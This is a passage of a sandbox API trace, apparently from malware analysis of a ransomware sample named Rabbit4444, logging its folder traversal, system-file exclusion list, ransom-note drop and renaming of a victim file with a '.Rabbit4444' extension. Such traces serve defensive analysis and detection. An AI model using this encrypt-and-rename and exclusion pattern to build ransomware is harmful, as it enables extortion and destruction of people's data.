lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x5bd69dbd, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe98ab4b8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0054.063] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.063] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.063] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.063] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.063] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x5bd69dbd, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe98ab4b8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.063] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.063] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.063] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.063] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.063] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.063] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe98ab4b8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe98ab4b8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe98ab4b8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.063] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.063] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.063] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x517e05da, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x517e05da, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x517e05da, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Collab", cAlternateFileName="")) returned 1 [0054.063] lstrcmpiW (lpString1="Collab", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.063] lstrcmpiW (lpString1="Collab", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.063] lstrcmpiW (lpString1="Collab", lpString2="Rabbit4444.exe") returned -1 [0054.063] lstrcmpiW (lpString1="Collab", lpString2=".") returned 1 [0054.063] lstrcmpiW (lpString1="Collab", lpString2="..") returned 1 [0054.064] lstrcmpiW (lpString1="Collab", lpString2="windows") returned -1 [0054.064] lstrcmpiW (lpString1="Collab", lpString2="bootmgr") returned 1 [0054.064] lstrcmpiW (lpString1="Collab", lpString2="pagefile.sys") returned -1 [0054.064] lstrcmpiW (lpString1="Collab", lpString2="boot") returned 1 [0054.064] lstrcmpiW (lpString1="Collab", lpString2="ids.txt") returned -1 [0054.064] lstrcmpiW (lpString1="Collab", lpString2="NTUSER.DAT") returned -1 [0054.064] lstrcpyW (in: lpString1=0x130eb9a, lpString2="Collab" | out: lpString1="Collab") returned="Collab" [0054.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0054.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x70) returned 0x117c20 [0054.064] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf6570 [0054.064] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5163cbb3, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5163cbb3, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5163cbb3, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Forms", cAlternateFileName="")) returned 1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2="Rabbit4444.exe") returned -1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2=".") returned 1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2="..") returned 1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2="windows") returned -1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2="bootmgr") returned 1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2="pagefile.sys") returned -1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2="boot") returned 1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2="ids.txt") returned -1 [0054.064] lstrcmpiW (lpString1="Forms", lpString2="NTUSER.DAT") returned -1 [0054.064] lstrcpyW (in: lpString1=0x130eb9a, lpString2="Forms" | out: lpString1="Forms") returned="Forms" [0054.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0054.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6e) returned 0x117608 [0054.064] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6590 [0054.064] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b406794, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xd82b1d84, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd82b1d84, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JSCache", cAlternateFileName="")) returned 1 [0054.064] lstrcmpiW (lpString1="JSCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.064] lstrcmpiW (lpString1="JSCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.064] lstrcmpiW (lpString1="JSCache", lpString2="Rabbit4444.exe") returned -1 [0054.064] lstrcmpiW (lpString1="JSCache", lpString2=".") returned 1 [0054.064] lstrcmpiW (lpString1="JSCache", lpString2="..") returned 1 [0054.064] lstrcmpiW (lpString1="JSCache", lpString2="windows") returned -1 [0054.064] lstrcmpiW (lpString1="JSCache", lpString2="bootmgr") returned 1 [0054.064] lstrcmpiW (lpString1="JSCache", lpString2="pagefile.sys") returned -1 [0054.064] lstrcmpiW (lpString1="JSCache", lpString2="boot") returned 1 [0054.064] lstrcmpiW (lpString1="JSCache", lpString2="ids.txt") returned 1 [0054.065] lstrcmpiW (lpString1="JSCache", lpString2="NTUSER.DAT") returned -1 [0054.065] lstrcpyW (in: lpString1=0x130eb9a, lpString2="JSCache" | out: lpString1="JSCache") returned="JSCache" [0054.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0054.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x72) returned 0x10e568 [0054.065] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xf6490 [0054.065] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5c7194c4, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5c7194c4, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0054.065] lstrcmpiW (lpString1="Security", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.065] lstrcmpiW (lpString1="Security", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.065] lstrcmpiW (lpString1="Security", lpString2="Rabbit4444.exe") returned 1 [0054.065] lstrcmpiW (lpString1="Security", lpString2=".") returned 1 [0054.065] lstrcmpiW (lpString1="Security", lpString2="..") returned 1 [0054.065] lstrcmpiW (lpString1="Security", lpString2="windows") returned -1 [0054.065] lstrcmpiW (lpString1="Security", lpString2="bootmgr") returned 1 [0054.065] lstrcmpiW (lpString1="Security", lpString2="pagefile.sys") returned 1 [0054.065] lstrcmpiW (lpString1="Security", lpString2="boot") returned 1 [0054.065] lstrcmpiW (lpString1="Security", lpString2="ids.txt") returned 1 [0054.065] lstrcmpiW (lpString1="Security", lpString2="NTUSER.DAT") returned 1 [0054.065] lstrcpyW (in: lpString1=0x130eb9a, lpString2="Security" | out: lpString1="Security") returned="Security" [0054.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6448 [0054.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x74) returned 0x10dd68 [0054.065] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6450 | out: ListHead=0xf68b0, ListEntry=0xf6450) returned 0xf6530 [0054.065] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5c7194c4, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5c7194c4, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 0 [0054.065] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0054.065] lstrcpyW (in: lpString1=0x130eb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.065] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.069] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.070] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.070] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.070] CloseHandle (hObject=0x278) returned 1 [0054.070] CloseHandle (hObject=0x27c) returned 1 [0054.070] GetCurrentThreadId () returned 0xd98 [0054.070] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6450 [0054.070] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security" [0054.070] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10dd68 | out: hHeap=0xe0000) returned 1 [0054.070] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6448 | out: hHeap=0xe0000) returned 1 [0054.070] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security" [0054.070] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\" [0054.071] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\.BFC0E91B00AE8A0620D3" [0054.071] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.072] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.074] FlushFileBuffers (hFile=0x27c) returned 1 [0054.075] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.076] CloseHandle (hObject=0x27c) returned 1 [0054.076] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security") returned 57 [0054.076] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.076] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5c7194c4, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe98d169a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0054.076] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.076] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.076] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.076] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.076] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5c7194c4, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe98d169a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.076] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.076] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.077] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.077] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.077] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.077] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe98d169a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe98d169a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe98d169a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.077] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.077] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.077] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c7194c4, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5c7194c4, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5c78bbf1, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x1ebe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="addressbook.acrodata", cAlternateFileName="ADDRES~1.ACR")) returned 1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Rabbit4444.exe") returned -1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2=".") returned 1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="..") returned 1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="windows") returned -1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="bootmgr") returned -1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="pagefile.sys") returned -1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="boot") returned -1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ids.txt") returned -1 [0054.077] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="NTUSER.DAT") returned -1 [0054.077] lstrcpyW (in: lpString1=0x130ebac, lpString2="addressbook.acrodata" | out: lpString1="addressbook.acrodata") returned="addressbook.acrodata" [0054.077] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata", dwFileAttributes=0x0) returned 1 [0054.078] lstrlenW (lpString="addressbook.acrodata") returned 20 [0054.078] lstrlenW (lpString="Rabbit4444") returned 10 [0054.078] lstrcmpiW (lpString1="k.acrodata", lpString2="Rabbit4444") returned -1 [0054.078] lstrlenW (lpString=".dll") returned 4 [0054.078] lstrcmpiW (lpString1="data", lpString2=".dll") returned 1 [0054.078] lstrlenW (lpString=".lnk") returned 4 [0054.078] lstrcmpiW (lpString1="data", lpString2=".lnk") returned 1 [0054.078] lstrlenW (lpString=".ini") returned 4 [0054.078] lstrcmpiW (lpString1="data", lpString2=".ini") returned 1 [0054.078] lstrlenW (lpString=".sys") returned 4 [0054.078] lstrcmpiW (lpString1="data", lpString2=".sys") returned 1 [0054.078] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.078] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.078] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14538916286) returned 1 [0054.078] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=7870) returned 1 [0054.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0054.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0054.079] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x21c0, lpName=0x0) returned 0x298 [0054.080] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x21c0) returned 0x70000 [0054.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0054.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0054.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0054.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0054.082] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14539305706) returned 1 [0054.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0054.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0054.082] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.083] CloseHandle (hObject=0x298) returned 1 [0054.083] CloseHandle (hObject=0x278) returned 1 [0054.083] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata.Rabbit4444") returned 89 [0054.083] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata.rabbit4444"), dwFlags=0x1) returned 1 [0054.083] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfcc0fc, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5bfcc0fc, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CRLCache", cAlternateFileName="")) returned 1 [0054.083] lstrcmpiW (lpString1="CRLCache", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.083] lstrcmpiW (lpString1="CRLCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.083] lstrcmpiW (lpString1="CRLCache", lpString2="Rabbit4444.exe") returned -1 [0054.084] lstrcmpiW (lpString1="CRLCache", lpString2=".") returned 1 [0054.084] lstrcmpiW (lpString1="CRLCache", lpString2="..") returned 1 [0054.084] lstrcmpiW (lpString1="CRLCache", lpString2="windows") returned -1 [0054.084] lstrcmpiW (lpString1="CRLCache", lpString2="bootmgr") returned 1 [0054.084] lstrcmpiW (lpString1="CRLCache", lpString2="pagefile.sys") returned -1 [0054.084] lstrcmpiW (lpString1="CRLCache", lpString2="boot") returned 1 [0054.084] lstrcmpiW (lpString1="CRLCache", lpString2="ids.txt") returned -1 [0054.084] lstrcmpiW (lpString1="CRLCache", lpString2="NTUSER.DAT") returned -1 [0054.084] lstrcpyW (in: lpString1=0x130ebac, lpString2="CRLCache" | out: lpString1="CRLCache") returned="CRLCache" [0054.084] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0054.084] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x86) returned 0x1057c0 [0054.084] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6530 [0054.084] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfcc0fc, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5bfcc0fc, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CRLCache", cAlternateFileName="")) returned 0 [0054.084] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0054.084] lstrcpyW (in: lpString1=0x130ebac, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.084] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.086] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.086] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, 